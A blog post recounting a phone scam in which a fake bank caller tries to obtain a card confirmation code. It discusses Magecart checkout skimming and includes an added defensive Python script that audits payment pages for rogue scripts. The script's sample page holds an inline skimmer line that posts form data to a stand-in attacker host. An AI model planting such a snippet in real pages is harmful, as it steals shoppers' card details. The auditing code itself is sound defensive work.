When fraud becomes personal - a cautionary tale
A few nights ago, my wife received a phone call from the fraud department at her bank. They wanted to let her know that they were worried that there had been some fraudulent purchases on her credit card and wanted to take immediate action to prevent those purchases going forward.
They went through the necessary verification checks, where the caller listed the name on the account, the first line of the address and the last four digits of the credit card number. Finally, they got my wife to confirm the last purchase she’d made with the card, just to double check.
Unfortunately, according to the fraud team, it was looking like three purchases had been made with the card - totalling over £7,000, all from a suspicious IP address in Liverpool - and they wanted to put a block on the card immediately.
But to do so, they needed a final piece of security verification…
“We’re going to send you a confirmation code via text message - once you’ve got it, just read it back to us to confirm that you are the account holder and we’ll place an immediate stop on the account - preventing those fraudulent transactions going through.”
A few seconds later a text message came through - from the bank’s official number, in the same format and structure as all the other verification text messages she’d received from the bank:
XXX-XXX is your confirmation code for your purchase of 1720 GBP to FLUTTERWAVE. Please do not share this with anyone.
Hang on… A purchase? Of £1,720?? And what on earth is Flutterwave?!? “This doesn’t feel right,” my wife said, “I’m going to hang up and ring my bank directly.” The caller advised against doing that, because as a result of the fraudulent transactions, they’d locked her telephone banking account, and she could only do that in person, in branch, and it was now well past closing time.
You see, the thing is, the man on the phone wasn’t from my wife’s bank - he was a fraudster. A fraudster who had got hold of my wife’s credit card details and was trying to make a money transfer via Flutterwave, a fintech firm with some dubious associations with scams, fraud and money laundering. The trouble for the fraudster is that he’d run up against new measures brought in by banks in March last year, which required online retailers to demand additional verification, known as Strong Customer Authentication (SCA): https://www.fca.org.uk/firms/strong-customer-authentication
My wife was experiencing a scam that shows exactly why security measures such as Two Factor Authentication (2FA) do genuinely work, despite the impact on the “user experience”. This approach forces attackers to work harder, having to resort to additional techniques such as social engineering to make their fraud work. It’s no magic silver bullet, but it’s enough to raise the bar attackers must clear to achieve their aims.
So how did the fraudsters get hold of my wife’s credit card details, as well as our address and her phone number? The challenge is that we may never truly know for sure - but we can start to make a few assumptions:
If the card details had been taken by a Point-of-Sale skimmer (a compromised physical card scanner in shops), then they wouldn’t have had the address and phone number.
Even a discarded bank statement would be unlikely to have had all the fields - not to mention that paperless banking is largely the default these days.
Whilst a fraudster could have combined multiple data sets together, in reality Occam’s Razor would suggest that the data was taken all at the same time - and this sort of dataset is common with online shopping, and we’ve just come through peak season with Christmas and the January Sales.
An account on an online shopping portal could have become compromised, with information scraped from a user profile - but fraudsters work best at scale, and whilst logging in to lots of individual accounts could net them some reward, it’s potentially a lot of work, reducing the return on investment.
An online retailer could have had a backend database compromised, containing hundreds, if not thousands, of stored customer details. Retailers should be protecting this sort of data in accordance with the PCI DSS standard, which includes the use of encryption as well as not storing fields like the CVV/CVC number (the 3 or 4 digits on the back of the card), which the fraudster would almost certainly have needed to complete their purchase. Unfortunately, it’s not uncommon to hear stories of retailers not storing credit card data in a secure way, so it would be difficult to rule this one out entirely.
The card is no more than three months old, so any data breach has to have been recent. And one method of attack that has been enjoying an extended spell of success is a style of attack known as Magecart.
Magecart attacks really broke into the cybersecurity scene back in 2018, with the major brands of Ticketmaster and British Airways falling victim - and they’ve never really gone away. The attacks involve the compromise not of a backend data store, but of the payment page itself, with data siphoned off in real time as unsuspecting customers enter their details to make a purchase - one copy of the details going off to the legitimate retailer, and another off to the hackers.
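Because a Magecart skimmer lives in the checkout page’s own script, one defender-side check is to audit what script the page actually loads. The following is an added example (not code from the original post): it flags scripts served from origins outside a hypothetical allowlist, approved external scripts that lack a Subresource Integrity hash, and inline scripts that issue network requests. The allowlist, the sample page and every hostname in it are constructed.

```python
"""Checkout-page script audit for Magecart-style skimmers (added example).
The allowlist, sample HTML and hostnames below are constructed, not real."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical: the only origins permitted to serve script on the checkout page
ALLOWED_SCRIPT_ORIGINS = {"shop.example", "checkout.legit-psp.example"}

# Calls a skimmer typically uses to exfiltrate captured form data
NETWORK_MARKERS = ("fetch(", "XMLHttpRequest", "sendBeacon")


class ScriptAuditor(HTMLParser):
    """Collect findings about <script> tags and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        src = a.get("src")
        if src is None:
            self._in_script = True      # inline script: inspect its body
            return
        host = urlparse(src).hostname or ""   # "" means a relative, same-origin path
        if host and host not in ALLOWED_SCRIPT_ORIGINS:
            self.findings.append(f"script from unapproved origin: {src}")
        elif host and "integrity" not in a:
            self.findings.append(f"external script without SRI integrity: {src}")

    def handle_data(self, data):
        if self._in_script and any(m in data for m in NETWORK_MARKERS):
            self.findings.append("inline script issues network requests: " + data.strip()[:60])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def audit_checkout_page(html: str) -> list:
    """Return a list of human-readable findings for one page."""
    auditor = ScriptAuditor()
    auditor.feed(html)
    return auditor.findings


# Constructed sample: one approved PSP script plus two skimmer-shaped additions
SAMPLE_PAGE = """<html><body>
<script src="https://checkout.legit-psp.example/v3.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn-stats.evil.example/analytics.js"></script>
<script>document.forms[0].onsubmit=function(){fetch("https://cdn-stats.evil.example/c",{method:"POST",body:new FormData(this)})}</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_PAGE):
        print("FINDING:", finding)
```

Run it against a saved copy of a checkout page, or from a scheduled job that fetches the live page, and alert on any new finding; a Content-Security-Policy with strict script-src and connect-src directives enforces the same allowlist in the browser.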
In the end, my wife’s innate “spidey sense” was enough to put an end to the fraudster’s attempts - and with it the quick thinking to freeze her card via her bank’s mobile app, and follow-up calls with her bank to report the scam and get a brand new card issued. But I can well imagine this sort of scam is likely to garner some pretty decent levels of success, especially as online shopping continues to maintain its popularity following the steady increase over many years, plus a real jump due to the pandemic.
Security is often a trade-off with convenience, but I certainly don’t expect that ceasing all online shopping is the way forward. It’s also not enough to recommend you only shop via large reputable brands - after all, if Ticketmaster and British Airways can fall victim, so could much smaller brands. So what should people do? In reality, it’s best to focus on the phone calls themselves. There are two simple steps that everyone should consider if they ever get a call like this:
Never share a confirmation code, and especially not with an unsolicited caller.
If there is ever any doubt that an unsolicited caller is who they claim to be, hang up and ring them back using the number on the back of your card, or the number on their website.